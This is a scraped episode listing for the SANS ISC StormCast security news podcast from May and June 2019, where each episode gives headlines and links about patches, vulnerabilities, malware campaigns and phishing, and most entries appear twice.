Updates for Dell Support Assistant https://www.dell.com/support/article/us/en/04/sln317291/dsa-2019-084-dell-supportassist-for-business-pcs-and-dell-supportassist-for-home-pcs-security-update-for-pc-doctor-vulnerability?lang=en Critical Cisco Vulnerablity https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex LoudMiner Comes with VM https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/ STI Student Dave Todd: Overcoming the Comliance Challenges in Biometrics https://www.sans.org/reading-room/whitepapers/legal/paper/38970
6/21/201914 minutes, 32 seconds
Episode Artwork

ISC StormCast for Friday, June 21st 2019

Updates for Dell Support Assistant https://www.dell.com/support/article/us/en/04/sln317291/dsa-2019-084-dell-supportassist-for-business-pcs-and-dell-supportassist-for-home-pcs-security-update-for-pc-doctor-vulnerability?lang=en Critical Cisco Vulnerablity https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex LoudMiner Comes with VM https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/ STI Student Dave Todd: Overcoming the Comliance Challenges in Biometrics https://www.sans.org/reading-room/whitepapers/legal/paper/38970
6/21/201914 minutes, 32 seconds
Episode Artwork

ISC StormCast for Thursday, June 20th 2019

Critical Patch For WebLogic https://isc.sans.edu/forums/diary/Critical+Actively+Exploited+WebLogic+Flaw+Patched+CVE20192729/25050/ Exim Exploits Against Other Mail Servers https://isc.sans.edu/forums/diary/Quick+Detect+Exim+Return+of+the+Wizard+Attack/25052/ SANS Fire Presentations (to be published soon) https://isc.sans.edu/presentations
6/20/20195 minutes, 35 seconds
Episode Artwork

ISC StormCast for Thursday, June 20th 2019

Critical Patch For WebLogic https://isc.sans.edu/forums/diary/Critical+Actively+Exploited+WebLogic+Flaw+Patched+CVE20192729/25050/ Exim Exploits Against Other Mail Servers https://isc.sans.edu/forums/diary/Quick+Detect+Exim+Return+of+the+Wizard+Attack/25052/ SANS Fire Presentations (to be published soon) https://isc.sans.edu/presentations
6/20/20195 minutes, 35 seconds
Episode Artwork

ISC StormCast for Wednesday, June 19th 2019

Critical Firefox Update https://www.mozilla.org/en-US/security/advisories/mfsa2019-18/#CVE-2019-11707 Bitdefender Releases GandCrap Decryptor https://labs.bitdefender.com/2019/06/good-riddance-gandcrab-were-still-fixing-the-mess-you-left-behind/ Google Launches New Deceptive Site Protections in Chrome https://blog.chromium.org/2019/06/new-chrome-protections-from-deception.html
6/19/20195 minutes, 7 seconds
Episode Artwork

ISC StormCast for Wednesday, June 19th 2019

Critical Firefox Update https://www.mozilla.org/en-US/security/advisories/mfsa2019-18/#CVE-2019-11707 Bitdefender Releases GandCrap Decryptor https://labs.bitdefender.com/2019/06/good-riddance-gandcrab-were-still-fixing-the-mess-you-left-behind/ Google Launches New Deceptive Site Protections in Chrome https://blog.chromium.org/2019/06/new-chrome-protections-from-deception.html
6/19/20195 minutes, 7 seconds
Episode Artwork

ISC StormCast for Tuesday, June 18th 2019

TCP SACK Panic DoS in Linux https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md https://tools.ietf.org/html/rfc879 Logitech Pointer Recall https://www.heise.de/security/meldung/Angreifbare-Logitech-Presenter-Hersteller-tauscht-gefaehrliche-USB-Empfaenger-aus-4423627.html An Infection from the Rig Exploit Kit https://isc.sans.edu/forums/diary/An+infection+from+Rig+exploit+kit/25040/
6/18/20195 minutes, 45 seconds
Episode Artwork

ISC StormCast for Tuesday, June 18th 2019

TCP SACK Panic DoS in Linux https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md https://tools.ietf.org/html/rfc879 Logitech Pointer Recall https://www.heise.de/security/meldung/Angreifbare-Logitech-Presenter-Hersteller-tauscht-gefaehrliche-USB-Empfaenger-aus-4423627.html An Infection from the Rig Exploit Kit https://isc.sans.edu/forums/diary/An+infection+from+Rig+exploit+kit/25040/
6/18/20195 minutes, 45 seconds
Episode Artwork

ISC StormCast for Monday, June 17th 2019

Whats App Phishing https://www.heise.de/newsticker/meldung/Phishing-Mails-gaukeln-Ende-von-WhatsApp-Abonnement-vor-4447165.html Encrypted EMail Phishing https://www.bleepingcomputer.com/news/security/phishing-scam-asks-you-to-login-to-read-encrypted-message/ Android Apps Link to Fake Sites https://news.drweb.com/show/?i=13313&lng=en&c=5 Precomputed Hash Tables https://a.ndronic.us/pre-computed-hash-table-v-1-0/
6/17/20195 minutes, 36 seconds
Episode Artwork

ISC StormCast for Monday, June 17th 2019

Whats App Phishing https://www.heise.de/newsticker/meldung/Phishing-Mails-gaukeln-Ende-von-WhatsApp-Abonnement-vor-4447165.html Encrypted EMail Phishing https://www.bleepingcomputer.com/news/security/phishing-scam-asks-you-to-login-to-read-encrypted-message/ Android Apps Link to Fake Sites https://news.drweb.com/show/?i=13313&lng=en&c=5 Precomputed Hash Tables https://a.ndronic.us/pre-computed-hash-table-v-1-0/
6/17/20195 minutes, 36 seconds
Episode Artwork

ISC StormCast for Friday, June 14th 2019

Exim Flaw Exploited https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability Yubico Recalling FIPS Certified Yubikeys https://www.yubico.com/support/security-advisories/ysa-2019-02/ Vulnerable Infusion Pumps https://www.bd.com/en-us/support/product-security-and-privacy/product-security-bulletins/alaris-gateway-workstation-unauthorized-firmware Telegram DDoS Attack https://twitter.com/telegram/status/1138768124914929664 Ghidra Tips for IDA Users: Function Call Graphs https://isc.sans.edu/forums/diary/A+few+Ghidra+tips+for+IDA+users+part+4+function+call+graphs/25032/ Joel Chapman: Security Consideration for Voice over Wifi (VoWifi) Systems https://www.sans.org/reading-room/whitepapers/telephone/paper/38945
6/14/201915 minutes, 15 seconds
Episode Artwork

ISC StormCast for Friday, June 14th 2019

Exim Flaw Exploited https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability Yubico Recalling FIPS Certified Yubikeys https://www.yubico.com/support/security-advisories/ysa-2019-02/ Vulnerable Infusion Pumps https://www.bd.com/en-us/support/product-security-and-privacy/product-security-bulletins/alaris-gateway-workstation-unauthorized-firmware Telegram DDoS Attack https://twitter.com/telegram/status/1138768124914929664 Ghidra Tips for IDA Users: Function Call Graphs https://isc.sans.edu/forums/diary/A+few+Ghidra+tips+for+IDA+users+part+4+function+call+graphs/25032/ Joel Chapman: Security Consideration for Voice over Wifi (VoWifi) Systems https://www.sans.org/reading-room/whitepapers/telephone/paper/38945
6/14/201915 minutes, 15 seconds
Episode Artwork

ISC StormCast for Thursday, June 13th 2019

Sandbox Escaper Publishes Additional CVE-2019-0841 Bypass http://archive.is/3toQY http://sandboxescaper.blogspot.com/p/disclosures_8.html Bypassing NTLM Message Signing (CVE-2019-1040) https://blog.preempt.com/drop-the-mic Details About macOS Keysteal Vulnerability https://www.pinauten.de/resources/KeySteal_OBTS_2019.pdf
6/13/20195 minutes, 10 seconds
Episode Artwork

ISC StormCast for Thursday, June 13th 2019

Sandbox Escaper Publishes Additional CVE-2019-0841 Bypass http://archive.is/3toQY http://sandboxescaper.blogspot.com/p/disclosures_8.html Bypassing NTLM Message Signing (CVE-2019-1040) https://blog.preempt.com/drop-the-mic Details About macOS Keysteal Vulnerability https://www.pinauten.de/resources/KeySteal_OBTS_2019.pdf
6/13/20195 minutes, 10 seconds
Episode Artwork

ISC StormCast for Wednesday, June 12th 2019

Microsoft Patches https://isc.sans.edu/forums/diary/MSFT+June+2019+Patch+Tuesday/25024/ Adobe Patches https://helpx.adobe.com/security.html SAP Security Notes https://www.onapsis.com/blog/sap-patch-notes-june-2019 Intel Updates https://www.us-cert.gov/ncas/current-activity/2019/06/11/Intel-Releases-Security-Updates-Mitigations-Multiple-Products Microsoft Certificate DoS https://bugs.chromium.org/p/project-zero/issues/detail?id=1804 GPS Receiver Woes https://www.flightglobal.com/news/articles/collins-gps-outage-grounds-regional-flights-458819/ RAMBleed Attack https://www.documentcloud.org/documents/6150180-RamBleed-attack-CVE-2019-0174.html
6/12/20196 minutes, 13 seconds
Episode Artwork

ISC StormCast for Wednesday, June 12th 2019

Microsoft Patches https://isc.sans.edu/forums/diary/MSFT+June+2019+Patch+Tuesday/25024/ Adobe Patches https://helpx.adobe.com/security.html SAP Security Notes https://www.onapsis.com/blog/sap-patch-notes-june-2019 Intel Updates https://www.us-cert.gov/ncas/current-activity/2019/06/11/Intel-Releases-Security-Updates-Mitigations-Multiple-Products Microsoft Certificate DoS https://bugs.chromium.org/p/project-zero/issues/detail?id=1804 GPS Receiver Woes https://www.flightglobal.com/news/articles/collins-gps-outage-grounds-regional-flights-458819/ RAMBleed Attack https://www.documentcloud.org/documents/6150180-RamBleed-attack-CVE-2019-0174.html
6/12/20196 minutes, 13 seconds
Episode Artwork

ISC StormCast for Tuesday, June 11th 2019

Interesting JavaScript Obfuscation Example https://isc.sans.edu/forums/diary/Interesting+JavaScript+Obfuscation+Example/25020/ Spam Taking Advantage of DNS over HTTPS https://myonlinesecurity.co.uk/it-looks-like-another-dns-compromise-hack-happening/ European Mobile Operator Traffic Leaked to China https://arstechnica.com/information-technology/2019/06/bgp-mishap-sends-european-mobile-traffic-through-china-telecom-for-2-hours/?comments=1 VLC Update Patches Various Security Flaws http://www.jbkempf.com/blog/post/2019/VLC-3.0.7-and-security
6/11/20196 minutes, 9 seconds
Episode Artwork

ISC StormCast for Tuesday, June 11th 2019

Interesting JavaScript Obfuscation Example https://isc.sans.edu/forums/diary/Interesting+JavaScript+Obfuscation+Example/25020/ Spam Taking Advantage of DNS over HTTPS https://myonlinesecurity.co.uk/it-looks-like-another-dns-compromise-hack-happening/ European Mobile Operator Traffic Leaked to China https://arstechnica.com/information-technology/2019/06/bgp-mishap-sends-european-mobile-traffic-through-china-telecom-for-2-hours/?comments=1 VLC Update Patches Various Security Flaws http://www.jbkempf.com/blog/post/2019/VLC-3.0.7-and-security
6/11/20196 minutes, 9 seconds
Episode Artwork

ISC StormCast for Monday, June 10th 2019

Keep An Eye On Your WMI Logs https://isc.sans.edu/forums/diary/Keep+an+Eye+on+Your+WMI+Logs/25012/ Sysmon DNS Query Logging https://isc.sans.edu/forums/diary/Tip+Sysmon+Will+Log+DNS+Queries/25016/ Komodo Agama Vulnerability and Breach https://komodoplatform.com/update-agama-vulnerability/ Lessons Learned From Microsoft SOC https://www.microsoft.com/security/blog/2019/06/06/lessons-learned-from-the-microsoft-soc-part-2b-career-paths-and-readiness/
6/10/20197 minutes, 37 seconds
Episode Artwork

ISC StormCast for Monday, June 10th 2019

Keep An Eye On Your WMI Logs https://isc.sans.edu/forums/diary/Keep+an+Eye+on+Your+WMI+Logs/25012/ Sysmon DNS Query Logging https://isc.sans.edu/forums/diary/Tip+Sysmon+Will+Log+DNS+Queries/25016/ Komodo Agama Vulnerability and Breach https://komodoplatform.com/update-agama-vulnerability/ Lessons Learned From Microsoft SOC https://www.microsoft.com/security/blog/2019/06/06/lessons-learned-from-the-microsoft-soc-part-2b-career-paths-and-readiness/
6/10/20197 minutes, 37 seconds
Episode Artwork

ISC StormCast for Friday, June 7th 2019

GoldBrute Botnet Brute Forcing RDP https://isc.sans.edu/forums/diary/GoldBrute+Botnet+Brute+Forcing+15+Million+RDP+Servers/25002/ Exim Vulnerability https://isc.sans.edu/forums/diary/Time+is+partially+on+our+side+the+new+Exim+vulnerability/25008/ iOS App Developers Disabling TLS https://www.wandera.com/mobile-security/ios-app-developer-security-shortcuts/
6/6/20197 minutes, 14 seconds
Episode Artwork

ISC StormCast for Friday, June 7th 2019

GoldBrute Botnet Brute Forcing RDP https://isc.sans.edu/forums/diary/GoldBrute+Botnet+Brute+Forcing+15+Million+RDP+Servers/25002/ Exim Vulnerability https://isc.sans.edu/forums/diary/Time+is+partially+on+our+side+the+new+Exim+vulnerability/25008/ iOS App Developers Disabling TLS https://www.wandera.com/mobile-security/ios-app-developer-security-shortcuts/
6/6/20197 minutes, 14 seconds
Episode Artwork

ISC StormCast for Thursday, June 6th 2019

Android Monthly Update https://source.android.com/security/bulletin/2019-06-01 Google Chrome Updates https://chromereleases.googleblog.com/2019/06/stable-channel-update-for-desktop.html MacOS Malware Injects Bing Ads https://www.airoav.com/mitm-proxy-a-new-search-hijack-method-on-mojave/ Kubernetes Vulnerability https://github.com/kubernetes/kubernetes/issues/78308 Vulnerabilities in Phihsing Kits https://blogs.akamai.com/sitr/2019/06/identifying-vulnerabilities-in-phishing-kits.html
6/6/20195 minutes, 22 seconds
Episode Artwork

ISC StormCast for Thursday, June 6th 2019

Android Monthly Update https://source.android.com/security/bulletin/2019-06-01 Google Chrome Updates https://chromereleases.googleblog.com/2019/06/stable-channel-update-for-desktop.html MacOS Malware Injects Bing Ads https://www.airoav.com/mitm-proxy-a-new-search-hijack-method-on-mojave/ Kubernetes Vulnerability https://github.com/kubernetes/kubernetes/issues/78308 Vulnerabilities in Phihsing Kits https://blogs.akamai.com/sitr/2019/06/identifying-vulnerabilities-in-phishing-kits.html
6/6/20195 minutes, 22 seconds
Episode Artwork

ISC StormCast for Wednesday, June 5th 2019

Vulnerability in Notepad https://threatpost.com/researcher-exploits-microsofts-notepad-to-pop-a-shell/145242/ Vulnerability in vim/neovim https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md RDP Session Hijack Vulnerability https://kb.cert.org/vuls/id/576688/
6/5/20195 minutes, 33 seconds
Episode Artwork

ISC StormCast for Wednesday, June 5th 2019

Vulnerability in Notepad https://threatpost.com/researcher-exploits-microsofts-notepad-to-pop-a-shell/145242/ Vulnerability in vim/neovim https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md RDP Session Hijack Vulnerability https://kb.cert.org/vuls/id/576688/
6/5/20195 minutes, 33 seconds
Episode Artwork

ISC StormCast for Tuesday, June 4th 2019

Bypassing macOS Synthetic Click Protection https://www.wired.com/story/apple-macos-bug-synthetic-clicks/ Intel Microcode Updates for Older Windows 10 Versions https://support.microsoft.com/en-us/help/4494454/kb4494454-intel-microcode-updates Fake AntiVirus Adds in Microsoft Games https://answers.microsoft.com/en-us/windows/forum/all/malvertising-attack-on-microsoft-games/ced7ab87-7e0e-422b-97b7-fbfaed2b68a0 GandGrab Shutting Down https://www.zdnet.com/article/gandcrab-ransomware-operation-says-its-shutting-down/
6/4/20195 minutes, 27 seconds
Episode Artwork

ISC StormCast for Tuesday, June 4th 2019

Bypassing macOS Synthetic Click Protection https://www.wired.com/story/apple-macos-bug-synthetic-clicks/ Intel Microcode Updates for Older Windows 10 Versions https://support.microsoft.com/en-us/help/4494454/kb4494454-intel-microcode-updates Fake AntiVirus Adds in Microsoft Games https://answers.microsoft.com/en-us/windows/forum/all/malvertising-attack-on-microsoft-games/ced7ab87-7e0e-422b-97b7-fbfaed2b68a0 GandGrab Shutting Down https://www.zdnet.com/article/gandcrab-ransomware-operation-says-its-shutting-down/
6/4/20195 minutes, 27 seconds
Episode Artwork

ISC StormCast for Monday, June 3rd 2019

Google Outage https://status.cloud.google.com/incident/compute/19003 Major Vulnerability in Siemens LOGO Controllers https://cert-portal.siemens.com/productcert/pdf/ssa-542701.pdf Exposing TOR Users Via Cache Poisoning https://blog.duszynski.eu/tor-ip-disclosure-through-http-301-cache-poisoning/ nginx njs Vulnerability https://github.com/nginx/njs/issues/131
6/3/20195 minutes, 57 seconds
Episode Artwork

ISC StormCast for Monday, June 3rd 2019

Google Outage https://status.cloud.google.com/incident/compute/19003 Major Vulnerability in Siemens LOGO Controllers https://cert-portal.siemens.com/productcert/pdf/ssa-542701.pdf Exposing TOR Users Via Cache Poisoning https://blog.duszynski.eu/tor-ip-disclosure-through-http-301-cache-poisoning/ nginx njs Vulnerability https://github.com/nginx/njs/issues/131
6/3/20195 minutes, 57 seconds
Episode Artwork

ISC StormCast for Friday, May 31st 2019

Analysing Shell Code with scdbg https://isc.sans.edu/forums/diary/Analyzing+First+Stage+Shellcode/24984/ GitHub Automating Security Patches https://help.github.com/en/articles/configuring-automated-security-fixes Exposed Docker Containers Uses for Cryptocoin Mining https://blog.trendmicro.com/trendlabs-security-intelligence/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims/ Mozilla Objecting To Web Packaging https://docs.google.com/document/d/1ha00dSGKmjoEh2mRiG8FIA5sJ1KihTuZe-AXX1r8P-8/preview#
5/31/20196 minutes, 43 seconds
Episode Artwork

ISC StormCast for Friday, May 31st 2019

Analysing Shell Code with scdbg https://isc.sans.edu/forums/diary/Analyzing+First+Stage+Shellcode/24984/ GitHub Automating Security Patches https://help.github.com/en/articles/configuring-automated-security-fixes Exposed Docker Containers Uses for Cryptocoin Mining https://blog.trendmicro.com/trendlabs-security-intelligence/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims/ Mozilla Objecting To Web Packaging https://docs.google.com/document/d/1ha00dSGKmjoEh2mRiG8FIA5sJ1KihTuZe-AXX1r8P-8/preview#
5/31/20196 minutes, 43 seconds
Episode Artwork

ISC StormCast for Thursday, May 30th 2019

Behavioural Malware Analysis With Microsoft Attack Surface Analyzer https://isc.sans.edu/forums/diary/Behavioural+Malware+Analysis+with+Microsoft+ASA/24980/ Docker Symlink Race Attack https://seclists.org/oss-sec/2019/q2/131 Nanshu Campaign Using Signed Rootkit https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
5/30/20196 minutes, 7 seconds
Episode Artwork

ISC StormCast for Thursday, May 30th 2019

Behavioural Malware Analysis With Microsoft Attack Surface Analyzer https://isc.sans.edu/forums/diary/Behavioural+Malware+Analysis+with+Microsoft+ASA/24980/ Docker Symlink Race Attack https://seclists.org/oss-sec/2019/q2/131 Nanshu Campaign Using Signed Rootkit https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
5/30/20196 minutes, 7 seconds
Episode Artwork

ISC StormCast for Wednesday, May 29th 2019

Office Document And Base64 Encoded PowerShell Script https://isc.sans.edu/forums/diary/Office+Document+BASE64+PowerShell/24976/ https://0xdf.gitlab.io/2019/05/21/malware-analysis-unnamed-emotet-doc.html Enumeration of BlueKeep Vulnerable Hosts https://blog.erratasec.com/2019/05/almost-one-million-vulnerable-to.html DHCP Client Vulnerablity Analysis https://sensepost.com/blog/2019/analysis-of-a-1day-cve-2019-0547-and-discovery-of-a-forgotten-condition-in-the-patch-cve-2019-0726-part-1-of-2/ Office File Deleting Phishing Emails https://www.bleepingcomputer.com/news/security/phishing-emails-pretend-to-be-office-365-file-deletion-alerts/
5/29/20195 minutes, 57 seconds
Episode Artwork

ISC StormCast for Wednesday, May 29th 2019

Office Document And Base64 Encoded PowerShell Script https://isc.sans.edu/forums/diary/Office+Document+BASE64+PowerShell/24976/ https://0xdf.gitlab.io/2019/05/21/malware-analysis-unnamed-emotet-doc.html Enumeration of BlueKeep Vulnerable Hosts https://blog.erratasec.com/2019/05/almost-one-million-vulnerable-to.html DHCP Client Vulnerablity Analysis https://sensepost.com/blog/2019/analysis-of-a-1day-cve-2019-0547-and-discovery-of-a-forgotten-condition-in-the-patch-cve-2019-0726-part-1-of-2/ Office File Deleting Phishing Emails https://www.bleepingcomputer.com/news/security/phishing-emails-pretend-to-be-office-365-file-deletion-alerts/
5/29/20195 minutes, 57 seconds
Episode Artwork

ISC StormCast for Tuesday, May 28th 2019

MacOS GateKeeper Bypass https://www.fcvl.net/vulnerabilities/macosx-gatekeeper-bypass Fortinet FortiOS SSL VPN Vulnerabilities https://fortiguard.com/psirt Customizing NMAP Service Detection https://isc.sans.edu/forums/diary/Video+nmap+Service+Detection+Customization/24970/
5/28/20195 minutes, 45 seconds
Episode Artwork

ISC StormCast for Tuesday, May 28th 2019

MacOS GateKeeper Bypass https://www.fcvl.net/vulnerabilities/macosx-gatekeeper-bypass Fortinet FortiOS SSL VPN Vulnerabilities https://fortiguard.com/psirt Customizing NMAP Service Detection https://isc.sans.edu/forums/diary/Video+nmap+Service+Detection+Customization/24970/
5/28/20195 minutes, 45 seconds
Episode Artwork

ISC StormCast for Friday, May 24th 2019

Dangers of Custom URL Schemes https://zeropwn.github.io/2019-05-22-fun-with-uri-handlers/ Update on Phyiscal Skimmer Market https://www.advanced-intel.com/blog/skimming-threat-landscape-technology-advances-lower-barriers-of-entry-for-novice-skimming-operators Apple Supplemental Update For masOS 10.14.5 https://support.apple.com/kb/DL2005?locale=en_US Microsoft Releases Advanced Threat Protection for MacOS https://techcommunity.microsoft.com/t5/Windows-Defender-ATP/Microsoft-Defender-ATP-for-Mac-now-in-open-public-preview/ba-p/634603
5/24/20196 minutes, 5 seconds
Episode Artwork

ISC StormCast for Friday, May 24th 2019

Dangers of Custom URL Schemes https://zeropwn.github.io/2019-05-22-fun-with-uri-handlers/ Update on Phyiscal Skimmer Market https://www.advanced-intel.com/blog/skimming-threat-landscape-technology-advances-lower-barriers-of-entry-for-novice-skimming-operators Apple Supplemental Update For masOS 10.14.5 https://support.apple.com/kb/DL2005?locale=en_US Microsoft Releases Advanced Threat Protection for MacOS https://techcommunity.microsoft.com/t5/Windows-Defender-ATP/Microsoft-Defender-ATP-for-Mac-now-in-open-public-preview/ba-p/634603
5/24/20196 minutes, 5 seconds
Episode Artwork

ISC StormCast for Thursday, May 23rd 2019

An Update on the Microsoft Windows RDP BlueKeep Vulnerablity https://isc.sans.edu/forums/diary/An+Update+on+the+Microsoft+Windows+RDP+Bluekeep+Vulnerability+CVE20190708+now+with+pcaps/24960/ New Zero Day Exploits by SandboxEscaper https://github.com/SandboxEscaper/polarbearrepo Signed Exploit Code https://medium.com/@chroniclesec/abusing-code-signing-for-profit-ef80a37b50f4
5/22/20196 minutes, 18 seconds
Episode Artwork

ISC StormCast for Thursday, May 23rd 2019

An Update on the Microsoft Windows RDP BlueKeep Vulnerablity https://isc.sans.edu/forums/diary/An+Update+on+the+Microsoft+Windows+RDP+Bluekeep+Vulnerability+CVE20190708+now+with+pcaps/24960/ New Zero Day Exploits by SandboxEscaper https://github.com/SandboxEscaper/polarbearrepo Signed Exploit Code https://medium.com/@chroniclesec/abusing-code-signing-for-profit-ef80a37b50f4
5/22/20196 minutes, 18 seconds
Episode Artwork

ISC StormCast for Wednesday, May 22nd 2019

Setting Up Shodan Monitoring https://isc.sans.edu/forums/diary/Using+Shodan+Monitoring/24956/ Fingerprinting Smartphones With Gyroscope Data https://sensorid.cl.cam.ac.uk/ 20% of Linux Docker Containers Without Password https://www.kennasecurity.com/20-of-the-1000-most-popular-docker-containers-have-no-root-password/ RDP #bluekeep Signature For Snort/Suricata https://github.com/nccgroup/Cyber-Defence/blob/master/Signatures/suricata/2019_05_rdp_cve_2019_0708.txt
5/21/20195 minutes, 32 seconds
Episode Artwork

ISC StormCast for Wednesday, May 22nd 2019

Setting Up Shodan Monitoring https://isc.sans.edu/forums/diary/Using+Shodan+Monitoring/24956/ Fingerprinting Smartphones With Gyroscope Data https://sensorid.cl.cam.ac.uk/ 20% of Linux Docker Containers Without Password https://www.kennasecurity.com/20-of-the-1000-most-popular-docker-containers-have-no-root-password/ RDP #bluekeep Signature For Snort/Suricata https://github.com/nccgroup/Cyber-Defence/blob/master/Signatures/suricata/2019_05_rdp_cve_2019_0708.txt
5/21/20195 minutes, 32 seconds
Episode Artwork

ISC StormCast for Tuesday, May 21st 2019

MSFT RDP Vulnerability (#BlueKeep) Update https://twitter.com/search?q=%23bluekeep Sharepoint Exploited https://isc.sans.edu/forums/diary/CVE20190604+Attack/24952/ Risks of JWT https://snikt.net/blog/2019/05/16/jwt-signature-vs-mac-attacks/ MuddyWater Campaign Evolves https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html
5/20/20195 minutes, 19 seconds
Episode Artwork

ISC StormCast for Tuesday, May 21st 2019

MSFT RDP Vulnerability (#BlueKeep) Update https://twitter.com/search?q=%23bluekeep Sharepoint Exploited https://isc.sans.edu/forums/diary/CVE20190604+Attack/24952/ Risks of JWT https://snikt.net/blog/2019/05/16/jwt-signature-vs-mac-attacks/ MuddyWater Campaign Evolves https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html
5/20/20195 minutes, 19 seconds
Episode Artwork

ISC StormCast for Monday, May 20th 2019

Google Analyzes Vendor Response to 0-Day Exploits https://googleprojectzero.blogspot.com/p/0day.html ASUS WebStorage Abused For Malware Distribution https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/ Vulnerabilities in Apple Air Drop https://www.usenix.org/system/files/sec19fall_stute_prepub.pdf
5/19/20195 minutes, 38 seconds
Episode Artwork

ISC StormCast for Monday, May 20th 2019

Google Analyzes Vendor Response to 0-Day Exploits https://googleprojectzero.blogspot.com/p/0day.html ASUS WebStorage Abused For Malware Distribution https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/ Vulnerabilities in Apple Air Drop https://www.usenix.org/system/files/sec19fall_stute_prepub.pdf
5/19/20195 minutes, 38 seconds
Episode Artwork

ISC StormCast for Friday, May 17th 2019

The Risk of Authenticated Vulnerability Scans https://isc.sans.edu/forums/diary/The+Risk+of+Authenticated+Vulnerability+Scans/24942/ ARIN Revokes about 735,000 IP Addresses https://www.arin.net/vault/about_us/media/releases/20190513.html More Cisco Patches (Prime Infrastructure, EPN Manager) https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-pi-rce Instrument Landing Systems Spoofing https://aanjhan.com/assets/ils_usenix2019.pdf
5/17/20196 minutes, 1 second
Episode Artwork

ISC StormCast for Friday, May 17th 2019

The Risk of Authenticated Vulnerability Scans https://isc.sans.edu/forums/diary/The+Risk+of+Authenticated+Vulnerability+Scans/24942/ ARIN Revokes about 735,000 IP Addresses https://www.arin.net/vault/about_us/media/releases/20190513.html More Cisco Patches (Prime Infrastructure, EPN Manager) https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-pi-rce Instrument Landing Systems Spoofing https://aanjhan.com/assets/ils_usenix2019.pdf
5/17/20196 minutes, 1 second
Episode Artwork

ISC StormCast for Thursday, May 16th 2019

Forbes Website Infected by Magecart https://twitter.com/bad_packets/status/1128517905765683201 Malware Randomizes TLS Ciphers https://blogs.akamai.com/sitr/2019/05/bots-tampering-with-tls-to-avoid-detection.html Google Recalls Titan Security Keys https://security.googleblog.com/2019/05/titan-keys-update.html SAMBA Update https://www.samba.org/samba/security/CVE-2018-16860.html SAP Patches https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=520259032
5/16/20195 minutes, 12 seconds
Episode Artwork

ISC StormCast for Thursday, May 16th 2019

Forbes Website Infected by Magecart https://twitter.com/bad_packets/status/1128517905765683201 Malware Randomizes TLS Ciphers https://blogs.akamai.com/sitr/2019/05/bots-tampering-with-tls-to-avoid-detection.html Google Recalls Titan Security Keys https://security.googleblog.com/2019/05/titan-keys-update.html SAMBA Update https://www.samba.org/samba/security/CVE-2018-16860.html SAP Patches https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=520259032
5/16/20195 minutes, 12 seconds
Episode Artwork

ISC StormCast for Wednesday, May 15th 2019

New Intel CPU Vulnerabilities https://cpu.fail/ Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+May+2019+Patch+Tuesday/24934/ Apple Updates https://support.apple.com/en-us/HT201222 Broken Trustseal https://twitter.com/gwillem/status/1127890329175244800 https://twitter.com/bestoftheweb/status/1128036593208524800
5/15/20196 minutes, 14 seconds
Episode Artwork

ISC StormCast for Wednesday, May 15th 2019

New Intel CPU Vulnerabilities https://cpu.fail/ Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+May+2019+Patch+Tuesday/24934/ Apple Updates https://support.apple.com/en-us/HT201222 Broken Trustseal https://twitter.com/gwillem/status/1127890329175244800 https://twitter.com/bestoftheweb/status/1128036593208524800
5/15/20196 minutes, 14 seconds
Episode Artwork

ISC StormCast for Tuesday, May 14th 2019

Linux Remote Code Execution When Closing TCP Sockets https://github.com/torvalds/linux/commit/cb66ddd156203daefb8d71158036b27b0e2caf63 WhatsApp Buffer Overflow Exploited to Install Spyware https://www.facebook.com/security/advisories/cve-2019-3568 Cisco Vulnerabilities Lead to Trust Anchor Module Exploit https://thrangrycat.com/ Linksys Unauthenticated Information Leak https://badpackets.net/over-25000-linksys-smart-wi-fi-routers-vulnerable-to-sensitive-information-disclosure-flaw/
5/14/20195 minutes, 33 seconds
Episode Artwork

ISC StormCast for Tuesday, May 14th 2019

Linux Remote Code Execution When Closing TCP Sockets https://github.com/torvalds/linux/commit/cb66ddd156203daefb8d71158036b27b0e2caf63 WhatsApp Buffer Overflow Exploited to Install Spyware https://www.facebook.com/security/advisories/cve-2019-3568 Cisco Vulnerabilities Lead to Trust Anchor Module Exploit https://thrangrycat.com/ Linksys Unauthenticated Information Leak https://badpackets.net/over-25000-linksys-smart-wi-fi-routers-vulnerable-to-sensitive-information-disclosure-flaw/
5/14/20195 minutes, 33 seconds
Episode Artwork

ISC StormCast for Monday, May 13th 2019

DSSuite - A Docker Container with Didier's Tools https://isc.sans.edu/forums/diary/DSSuite+A+Docker+Container+with+Didiers+Tools/24926/ Sqlite3 Vulnerability https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0777 NVidia Updates https://nvidia.custhelp.com/app/answers/detail/a_id/4797 Windows 10 FIDO2 Certified https://fidoalliance.org/microsoft-achieves-fido2-certification-for-windows-hello/ Google May Remove ADB Backup/Restore from Future Android Versions https://www.xda-developers.com/adb-backup-and-restore-depreciated/
5/13/20195 minutes, 9 seconds
Episode Artwork

ISC StormCast for Monday, May 13th 2019

